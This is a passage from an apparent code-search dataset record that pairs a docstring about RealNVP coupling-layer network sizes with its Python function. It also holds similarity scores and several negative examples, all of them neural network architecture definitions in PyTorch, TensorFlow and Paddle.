self.threshold.data.clamp_(self.min_threshold)" ]
[ "0.59731835", "0.5947797", "0.5704381", "0.5572308", "0.5527399", "0.54456806", "0.54195607", "0.5414224", "0.5396532", "0.53867406", "0.5374971", "0.5353075", "0.52843153", "0.52828944", "0.52818215", "0.52474177", "0.5239085", "0.5233961", "0.52310765", "0.52299416", "0.52266705", "0.5224868", "0.5223007", "0.5221212", "0.5221138", "0.5214281", "0.5205405", "0.52037317", "0.519206", "0.5187612", "0.5182267", "0.5171457", "0.5164433", "0.515469", "0.51528746", "0.5146397", "0.51317155", "0.51307803", "0.51288444", "0.5128402", "0.512338", "0.5117042", "0.5116776", "0.51139134", "0.5108193", "0.51063395", "0.5105254", "0.50824887", "0.50775254", "0.5072762", "0.5062616", "0.505408", "0.5050529", "0.5048969", "0.50470597", "0.5036004", "0.5028597", "0.50208676", "0.50205076", "0.50179225", "0.5003967", "0.50030124", "0.5001547", "0.49916875", "0.49875998", "0.49870545", "0.49865347", "0.49769694", "0.49730647", "0.49647322", "0.49625355", "0.49585187", "0.49563694", "0.49549967", "0.49502325", "0.49494746", "0.4947271", "0.4944898", "0.49405986", "0.49394417", "0.49366677", "0.49318978", "0.4929327", "0.4928529", "0.492729", "0.49236122", "0.49226892", "0.49188837", "0.49171722", "0.4911002", "0.4910043", "0.49089897", "0.49069613", "0.4901093", "0.48912355", "0.48910746", "0.48869142", "0.48866764", "0.48799437", "0.48762742" ]
0.71824807
0
We specify the FNN-based networks over here. A single network produces both the s and t parts. The Coupling Layer currently comprises one full transform, but this can be made more complex.
def coupling_layer_specifications(hyper_params):
    D = hyper_params['data_dim']
    H = hyper_params['rnvp_num_hidden_units']

    d_1 = np.int(D//2) if D%2 == 0 else np.int(D//2) + 1
    d_2 = np.int(D - d_1)
    assert(d_1 + d_2 == D)

    coupling_layer_sizes = []
    coupling_layer_sizes.append([d_1, H, H, 2*d_2])
    coupling_layer_sizes.append([d_2, H, H, 2*d_1])

    return coupling_layer_sizes
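Illustrative usage sketch (not part of the original source): the sizes above have the form [in_dim, H, H, 2*out_dim], so a single fully connected network built from one of them can emit both s and t by splitting its final output in half. The example values for data_dim and rnvp_num_hidden_units, the init_mlp/mlp_forward helper names, and the tanh hidden activations below are assumptions for demonstration only.

import numpy as np

D, H = 6, 32                      # assumed example values for data_dim and rnvp_num_hidden_units
d_1 = D // 2 + (D % 2)            # mirrors the d_1/d_2 split computed above
d_2 = D - d_1
sizes = [d_1, H, H, 2 * d_2]      # first coupling layer's network: input d_1, output 2*d_2

def init_mlp(layer_sizes, rng):
    # One (W, b) pair per consecutive pair of layer sizes.
    return [(0.01 * rng.standard_normal((m, n)), np.zeros(n))
            for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]

def mlp_forward(params, x):
    # tanh hidden layers, linear output; the 2*d_2 output is split into s and t.
    for W, b in params[:-1]:
        x = np.tanh(x @ W + b)
    W, b = params[-1]
    out = x @ W + b
    s, t = np.split(out, 2, axis=-1)   # a single network produces both s and t
    return s, t

rng = np.random.default_rng(0)
params = init_mlp(sizes, rng)
x1 = rng.standard_normal((4, d_1))     # the half of the input that conditions s and t
s, t = mlp_forward(params, x1)         # each has shape (4, d_2)

One design point this illustrates: emitting a 2*out_dim vector and splitting it, rather than building separate s and t networks, lets the two parts share features and roughly halves the parameter count.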
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, channel):\n super(CoarseFineFlownet, self).__init__()\n in_c = channel * 2\n conv1 = nn.Sequential(nn.Conv2d(in_c, 24, 5, 2, 2), nn.ReLU(True))\n conv2 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv3 = nn.Sequential(nn.Conv2d(24, 24, 5, 2, 2), nn.ReLU(True))\n conv4 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv5 = nn.Sequential(nn.Conv2d(24, 32, 3, 1, 1), nn.Tanh())\n up1 = nn.PixelShuffle(4)\n self.coarse_flow = nn.Sequential(conv1, conv2, conv3, conv4, conv5, up1)\n in_c = channel * 3 + 2\n conv1 = nn.Sequential(nn.Conv2d(in_c, 24, 5, 2, 2), nn.ReLU(True))\n conv2 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv3 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv4 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv5 = nn.Sequential(nn.Conv2d(24, 8, 3, 1, 1), nn.Tanh())\n up2 = nn.PixelShuffle(2)\n self.fine_flow = nn.Sequential(conv1, conv2, conv3, conv4, conv5, up2)\n self.warp_c = STN(padding_mode='border')", "def __init__(self):\n super(DLStudio.ExperimentsWithCIFAR.Net2, self).__init__()\n self.relu = nn.ReLU()\n strides = []\n patch_size = 2\n ## conv1:\n out_ch, ker_size, conv_stride, pool_stride = 128,5,1,2\n self.conv1 = nn.Conv2d(3, out_ch, (ker_size,ker_size), padding=(ker_size-1)//2) \n self.pool1 = nn.MaxPool2d(patch_size, pool_stride) \n strides += (conv_stride, pool_stride)\n ## conv2:\n in_ch = out_ch\n out_ch, ker_size, conv_stride, pool_stride = 128,3,1,2\n self.conv2 = nn.Conv2d(in_ch, out_ch, ker_size, padding=(ker_size-1)//2)\n self.pool2 = nn.MaxPool2d(patch_size, pool_stride) \n strides += (conv_stride, pool_stride)\n ## conv3: \n ## meant for repeated invocation, must have same in_ch, out_ch and strides of 1\n in_ch = out_ch\n out_ch, ker_size, conv_stride, pool_stride = in_ch,2,1,1\n self.conv3 = nn.Conv2d(in_ch, out_ch, ker_size, padding=1)\n self.pool3 = nn.MaxPool2d(patch_size, pool_stride) \n# strides += (conv_stride, pool_stride)\n ## figure out the number of nodes needed for entry into fc:\n in_size_for_fc = out_ch * (32 // np.prod(strides)) ** 2 ## (A)\n self.in_size_for_fc = in_size_for_fc\n self.fc1 = nn.Linear(in_size_for_fc, 150)\n self.fc2 = nn.Linear(150, 100)\n self.fc3 = nn.Linear(100, 10)", "def unet_network(input_tensor, nb_classes):\n # contraction 1\n conv1 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv1')(\n input_tensor) # (batch_size, ?, ?, 64)\n conv2 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv2')(\n conv1) # (batch_size, ?, ?, 64)\n crop2 = Cropping2D(\n cropping=((88, 88), (88, 88)),\n name=\"crop2\")(\n conv2) # (batch_size, ?, ?, 64)\n maxpool2 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool2\")(\n conv2) # (batch_size, ?, ?, 64)\n\n # contraction 2\n conv3 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv3')(\n maxpool2) # (batch_size, ?, ?, 128)\n conv4 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv4')(\n conv3) # (batch_size, ?, ?, 128)\n crop4 = Cropping2D(\n cropping=((40, 40), (40, 40)),\n name=\"crop4\")(\n conv4) # (batch_size, ?, ?, 128)\n maxpool4 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool4\")(\n conv4) # ((batch_size, ?, ?, 128)\n\n # contraction 3\n conv5 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv5')(\n maxpool4) # (batch_size, ?, ?, 256)\n conv6 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n 
activation='relu',\n name='conv6')(\n conv5) # (batch_size, ?, ?, 256)\n crop6 = Cropping2D(\n cropping=((16, 16), (16, 16)),\n name=\"crop6\")(\n conv6) # (batch_size, ?, ?, 256)\n maxpool6 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool6\")(\n conv6) # (batch_size, ?, ?, 256)\n\n # contraction 4\n conv7 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv7')(\n maxpool6) # (batch_size, ?, ?, 512)\n conv8 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv8')(\n conv7) # (batch_size, ?, ?, 512)\n crop8 = Cropping2D(\n cropping=((4, 4), (4, 4)),\n name=\"crop8\")(\n conv8) # (batch_size, ?, ?, 512)\n maxpool8 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool8\")(\n conv8) # (batch_size, ?, ?, 512)\n\n # bottom\n conv9 = Conv2D(\n filters=1024,\n kernel_size=(3, 3),\n activation='relu',\n name='conv9')(\n maxpool8) # (batch_size, ?, ?, 1024)\n conv10 = Conv2D(\n filters=1024,\n kernel_size=(3, 3),\n activation='relu',\n name='conv10')(\n conv9) # (batch_size, ?, ?, 1024)\n\n # expansion 1\n upconv11 = up_conv_2d(\n input_tensor=conv10,\n nb_filters=512,\n name='upconv11') # (batch_size, ?, ?, 512)\n concat11 = tf.concat(\n values=[crop8, upconv11],\n axis=-1,\n name='concat11') # (batch_size, ?, ?, 1024)\n conv12 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv12')(\n concat11) # (batch_size, ?, ?, 512)\n conv13 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv13')(\n conv12) # (batch_size, ?, ?, 512)\n\n # expansion 2\n upconv14 = up_conv_2d(\n input_tensor=conv13,\n nb_filters=256,\n name='upconv14') # (batch_size, ?, ?, 256)\n concat14 = tf.concat(\n values=[crop6, upconv14],\n axis=-1,\n name='concat14') # (batch_size, ?, ?, 512)\n conv15 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv15')(\n concat14) # (batch_size, ?, ?, 256)\n conv16 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv16')(\n conv15) # (batch_size, ?, ?, 256)\n\n # expansion 3\n upconv17 = up_conv_2d(\n input_tensor=conv16,\n nb_filters=128,\n name='upconv17') # (batch_size, ?, ?, 128)\n concat17 = tf.concat(\n values=[crop4, upconv17],\n axis=-1,\n name='concat17') # (batch_size, ?, ?, 256)\n conv18 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv18')(\n concat17) # (batch_size, ?, ?, 128)\n conv19 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv19')(\n conv18) # (batch_size, ?, ?, 128)\n\n # expansion 4\n upconv20 = up_conv_2d(\n input_tensor=conv19,\n nb_filters=64,\n name='upconv20') # (batch_size, ?, ?, 64)\n concat20 = tf.concat(\n values=[crop2, upconv20],\n axis=-1,\n name='concat20') # (batch_size, ?, ?, 128)\n conv21 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv21')(\n concat20) # (batch_size, ?, ?, 64)\n conv22 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv22')(\n conv21) # (batch_size, ?, ?, 64)\n conv23 = Conv2D(\n filters=nb_classes,\n kernel_size=(1, 1),\n activation='sigmoid',\n name='conv23')(\n conv22) # (batch_size, ?, ?, nb_classes)\n\n return conv23", "def __cnnNetFn(self, input, is_training):\n with tf.variable_scope('CNN'):\n conv1 = tf.layers.conv2d(input, 32, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv1_bn = tf.layers.batch_normalization(conv1)\n conv2 = 
tf.layers.conv2d(conv1_bn, 32, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv2_bn = tf.layers.batch_normalization(conv2)\n conv2_pool = tf.layers.max_pooling2d(conv2_bn, 2, 2, padding='SAME')\n conv2_drop = tf.layers.dropout(conv2_pool, rate=0.2, training=is_training)\n\n conv3 = tf.layers.conv2d(conv2_drop, 64, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv3_bn = tf.layers.batch_normalization(conv3)\n conv4 = tf.layers.conv2d(conv3_bn, 64, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv4_bn = tf.layers.batch_normalization(conv4)\n conv4_pool = tf.layers.max_pooling2d(conv4_bn, 2, 2, padding='SAME')\n conv4_drop = tf.layers.dropout(conv4_pool, rate=0.3, training=is_training)\n\n conv5 = tf.layers.conv2d(conv4_drop, 128, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv5_bn = tf.layers.batch_normalization(conv5)\n conv6 = tf.layers.conv2d(conv5_bn, 128, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv6_pool = tf.layers.max_pooling2d(conv6, 2, 2, padding='SAME')\n\n csnn_features = tf.stop_gradient(self.__csnn.getTrainOp(input))\n csnn_features = tf.identity(csnn_features)\n if self.__use_csnn:\n joint_features = tf.concat((conv6_pool, csnn_features), axis=3)\n else:\n joint_features = conv6_pool\n\n conv6_bn = tf.layers.batch_normalization(joint_features)\n\n conv7 = tf.layers.conv2d(conv6_bn, 256, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv7_bn = tf.layers.batch_normalization(conv7)\n conv8 = tf.layers.conv2d(conv7_bn, 256, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv8_bn = tf.layers.batch_normalization(conv8)\n conv8_pool = tf.layers.max_pooling2d(conv8_bn, 2, 2, padding='SAME')\n conv8_drop = tf.layers.dropout(conv8_pool, rate=0.4, training=is_training)\n\n flat = tf.contrib.layers.flatten(conv8_drop)\n logits = tf.layers.dense(flat, self.__num_classes)\n return logits, csnn_features", "def __init__(self, args):\n \n super(MicroNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 1, kernel_size=1)\n self.conv2 = nn.Conv2d(1, 29, kernel_size=5)\n self.maxpool2 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv3 = nn.Conv2d(29, 59, kernel_size=3)\n self.maxpool3 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv4 = nn.Conv2d(59, 74, kernel_size=3)\n self.maxpool4 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv2_drop = nn.Dropout2d()\n self.conv3_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(1184, 300)\n self.fc2 = nn.Linear(300, args.num_classes)\n self.conv0_bn = nn.BatchNorm2d(3)\n self.conv1_bn = nn.BatchNorm2d(1)\n self.conv2_bn = nn.BatchNorm2d(29)\n self.conv3_bn = nn.BatchNorm2d(59)\n self.conv4_bn = nn.BatchNorm2d(74)\n self.dense1_bn = nn.BatchNorm1d(300)", "def __init__(self):\n super(CNN, self).__init__()\n\n self.conv0 = nn.Conv2d(3, 3, kernel_size=5, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv0.weight)\n\n self.conv1 = nn.Conv2d(3, 30, kernel_size=5, stride=2, padding=0)\n self.conv1.weight = nn.Parameter(get_filters())\n\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n self.conv2 = nn.Conv2d(30, 16, kernel_size=3, 
stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv2.weight)\n\n self.conv3 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv3.weight)\n\n self.conv4 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv4.weight)\n\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n self.conv5 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv5.weight)\n\n self.conv6 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv6.weight)\n\n self.conv7 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv7.weight)\n\n self.conv8 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv8.weight)\n\n self.fc = nn.Linear(16 * 5 * 5, 2)\n\n self.drop1 = nn.Dropout(p=0.5) # used only for the NC dataset", "def __init__(self, layers, input_size):\n super(ConvNetMaker, self).__init__()\n self.conv_layers = []\n self.fc_layers = []\n # h, w, d = 32, 32, 3\n h, w, d = input_size, input_size, 3\n previous_layer_filter_count = 3\n previous_layer_size = h * w * d\n num_fc_layers_remained = len([1 for l in layers if l.startswith('FC')])\n for layer in layers:\n if layer.startswith('Conv'):\n filter_count = int(layer[4:])\n self.conv_layers += [\n nn.Conv2d(previous_layer_filter_count,\n filter_count,\n kernel_size=3,\n padding=1),\n nn.BatchNorm2d(filter_count),\n nn.ReLU(inplace=True)\n ]\n\n previous_layer_filter_count = filter_count\n d = filter_count\n previous_layer_size = h * w * d\n elif layer.startswith('MaxPool'):\n self.conv_layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n h, w = int(h / 2.0), int(w / 2.0)\n previous_layer_size = h * w * d\n elif layer.startswith('FC'):\n num_fc_layers_remained -= 1\n current_layer_size = int(layer[2:])\n if num_fc_layers_remained == 0:\n self.fc_layers += [nn.Linear(previous_layer_size,\n current_layer_size)]\n else:\n self.fc_layers += [nn.Linear(previous_layer_size,\n current_layer_size),\n nn.ReLU(inplace=True)]\n previous_layer_size = current_layer_size\n\n conv_layers = self.conv_layers\n fc_layers = self.fc_layers\n self.conv_layers = nn.Sequential(*conv_layers)\n self.fc_layers = nn.Sequential(*fc_layers)", "def build_bisenet(inputs, num_classes):\n\n ### The spatial path\n ### The number of feature maps for each convolution is not specified in the paper\n ### It was chosen here to be equal to the number of feature maps of a classification\n ### model at each corresponding stage\n # spatial_net = fluid.layers.resize_bilinear(inputs, [Image_Height/8, Image_Width/8])\n # print('spatial_net_1',spatial_net)\n\n ## spatial path\n spatial_net = ConvBlock(inputs, num_filters=64, kernel_size=3, stride=2)\n spatial_net = ConvBlock(spatial_net, num_filters=128, kernel_size=3, stride=2)\n spatial_net = ConvBlock(spatial_net, num_filters=256, kernel_size=3, stride=2)\n # print(\"spatial_net:\", spatial_net)\n\n # spatial_net = fluid.layers.resize_bilinear(spatial_net, [Image_Height/8, Image_Width/8])\n # print('spatial_net_2',spatial_net)\n ### Context path\n model = ResNet(is_test=False)\n # spatial_net = model.bottleneck_block1(inputs)\n end_points_16, end_points_32 = model.net(inputs)\n net_4 = AttentionRefinementModule(end_points_16, num_filters=512)\n net_5 = AttentionRefinementModule(end_points_32, num_filters=1024)\n global_channels = fluid.layers.reduce_mean(net_5, [2, 3], keep_dim=True)\n net_5_scaled = 
fluid.layers.elementwise_mul(net_5, global_channels, axis=0)\n\n ### Combining the paths\n net_4 = Upsample(net_4, scale=2)\n net_5_scaled = Upsample(net_5_scaled, scale=4)\n # print('net_4, net_5:', [net_4, net_5_scaled])\n # layers_concat = list()\n # layers_concat.append(spatial_net)\n ## layers_concat.append(net_4)\n # layers_concat.append(net_5_scaled)\n context_net = fluid.layers.concat([spatial_net, net_4, net_5_scaled], axis=1) #\n # context_net = fluid.layers.concat(input=layers_concat,axis=1)\n # print('context_net', context_net)\n # context_net = fluid.layers.concat([net_4, net_5_scaled], axis=1)\n # print('context_net', context_net)\n # context_net = fluid.layers.concat([spatial_net,context_net], axis=1)\n # print('context_net2',context_net)\n\n ### FFM\n # net = FeatureFusionModule(input_1=spatial_net, input_2=context_net, num_filters=num_classes)\n net = FeatureFusionModule(inputs=context_net, num_filters=num_classes)\n\n # print('net', net)\n\n ## [batch_zize, num_filters, 128, 64]\n\n ### Final upscaling and finish\n # net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[256, 128])\n # print('conv2d_transpose', net)\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn1')\n net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[128, 256])\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn2')\n net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[256, 512])\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn3')\n #net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[512, 1024])\n #net = batch_normalization(net, relu=True, name='conv2d_transpose_bn4')\n # print('net',net)\n net = fluid.layers.image_resize(net, out_shape=[512, 1024], resample='BILINEAR')\n\n net = fluid.layers.conv2d(net, num_classes, 1)\n return net", "def __init__(self):\n super(SCNN, self).__init__()\n\n # Linear classifier.\n self.inplanes = 128\n self._norm_layer = nn.BatchNorm2d\n self.dilation = 1\n self.groups = 1\n self.base_width = 64\n\n self.num_class = 125\n backbone = torchvision.models.resnet34(pretrained=True)\n self.shared_features = nn.Sequential(*list(backbone.children())[0:6])\n #self.realistic_head = nn.Sequential(*list(backbone.children())[6:8])\n # self.synthetic_head = nn.Sequential(nn.Conv2d(128, 128, 3, 2, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 128, 3, 1, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 256, 3, 2, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True),\n # nn.Conv2d(256, 256, 3, 1, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True))\n\n self.synthetic_head1 = self._make_layer(BasicBlock, 128, 1, stride=2, dilate=False)\n self.synthetic_head2 = self._make_layer(BasicBlock, 256, 1, stride=2, dilate=False)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.classifier = nn.Linear(256, self.num_class)\n\n for m in self.synthetic_head1.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n for m in self.synthetic_head2.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n weight_init(self.classifier)\n\n 
for param in self.shared_features.parameters():\n param.requires_grad = False", "def __init__(self, resnet, num_classes):\n super(FineTune, self).__init__()\n\n # Everything except the last linear layer\n self.features = nn.Sequential(*list(resnet.children())[:-1])\n num_ftrs = resnet.fc.in_features\n self.classifier = nn.Sequential(\n nn.Linear(num_ftrs, num_classes)\n )\n\n # # Freeze those weights\n # for param in self.features.parameters():\n # param.requires_grad = False", "def __init__(self, config, input_shp):\n\n # Run initialization for super class\n super(MyNetwork, self).__init__()\n\n # Store configuration\n self.config = config\n\n # Placeholder for layers\n self.layers = {}\n indim = input_shp[0]\n\n # Retrieve Conv, Act, Pool functions from configurations. We'll use\n # these for our code below.\n if config.conv2d == \"torch\":\n self.Conv2d = nn.Conv2d\n elif config.conv2d == \"custom\":\n self.Conv2d = ConvBlock\n self.Activation = getattr(nn, config.activation)\n self.Pool2d = getattr(nn, config.pool2d)\n self.Linear = nn.Linear\n\n # Resnet Blocks, similar to slide 73 of lecture 21. However, for\n # simplicity, we'll make is slightly different. Note that we used\n # nn.Sequential this time.\n self.convs = nn.Sequential()\n cur_h, cur_w = input_shp[-2:]\n for _i in range(config.num_conv_outer):\n #\n # NOTE THE NEW LAYER ON THESE LINES!\n #\n # We have a dedicated 1x1 layer to get more channels. Note also\n # that this is a pure linear convolution layer.\n outdim = config.nchannel_base * 2 ** _i\n self.convs.add_module(\n \"conv_{}_base\".format(_i), nn.Conv2d(indim, outdim, 1, 1, 0))\n indim = outdim\n for _j in range(config.num_conv_inner):\n # We now use our selected convolution layer. Note that our\n # resnet implementation will have a different call style to\n # vanilla conv2d of torch, so we'll just do an ugly if-else\n # here.\n if config.conv2d == \"torch\":\n self.convs.add_module(\n \"conv_{}_{}\".format(_i, _j),\n self.Conv2d(indim, outdim, config.ksize, 1, 1))\n self.convs.add_module(\n \"act_{}_{}\".format(_i, _j),\n self.Activation())\n cur_h = cur_h - (config.ksize - 1)\n cur_w = cur_w - (config.ksize - 1)\n elif config.conv2d == \"custom\":\n self.convs.add_module(\n \"conv_{}_{}\".format(_i, _j),\n self.Conv2d(indim, outdim, config.ksize, 1, self.Activation))\n self.convs.add_module(\n \"conv_{}_pool\".format(_i), self.Pool2d(2, 2))\n cur_h = cur_h // 2\n cur_w = cur_w // 2\n\n # Final output layer. 
We'll assume that conv layer outputs are global\n # average pooled\n self.output = nn.Linear(indim, config.num_class)\n\n print(self)", "def __init__(self):\r\n\r\n super(Net, self).__init__()\r\n\r\n\r\n pre= models.inception_v3(pretrained=True)\r\n # Freeze model weights\r\n for param in pre.parameters():\r\n param.requires_grad = False\r\n\r\n n_inputs = pre.fc.in_features\r\n n_inputsaux = pre.AuxLogits.fc.in_features\r\n\r\n pre.fc = nn.Sequential(\r\n nn.Linear(n_inputs, 2000),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(2000),\r\n )\r\n\r\n pre.AuxLogits.fc = nn.Linear(n_inputsaux, 6)\r\n\r\n self.firstlayers = pre\r\n\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(2000, 1500),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(1500),\r\n nn.Linear(1500, 1500),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(1500),\r\n nn.Linear(1500, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 800),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(800),\r\n nn.Linear(800, 800),\r\n nn.ReLU(),\r\n )\r\n\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(800, 600),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(600),\r\n nn.Linear(600, 400),\r\n nn.ReLU(),\r\n nn.Linear(400, 300),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(300),\r\n nn.Linear(300, 200),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(200),\r\n nn.Linear(200, 100),\r\n nn.ReLU(),\r\n nn.Linear(100, 50),\r\n nn.ReLU(),\r\n nn.Linear(50, 6),\r\n nn.Sigmoid()\r\n )\r\n\r\n # Spatial transformer localization-network\r\n self.localization = nn.Sequential(\r\n nn.Conv2d(3, 8, kernel_size=20),\r\n nn.ReLU(True),\r\n nn.Conv2d(8, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=10, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5),\r\n nn.ReLU(True)\r\n\r\n )\r\n\r\n # Regressor for the 3 * 2 affine matrix\r\n self.fc_loc = nn.Sequential(\r\n nn.Linear(10 * 15 * 15, 32),\r\n nn.ReLU(True),\r\n nn.Linear(32, 3 * 2)\r\n )\r\n\r\n # Initialize the weights/bias with identity transformation\r\n self.fc_loc[2].weight.data.zero_()\r\n self.fc_loc[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\r\n\r\n self.phase = 0", "def __init__(self, conv_features_sizes, linear_layer_sizes, connector_shape):\n super().__init__()\n \n 
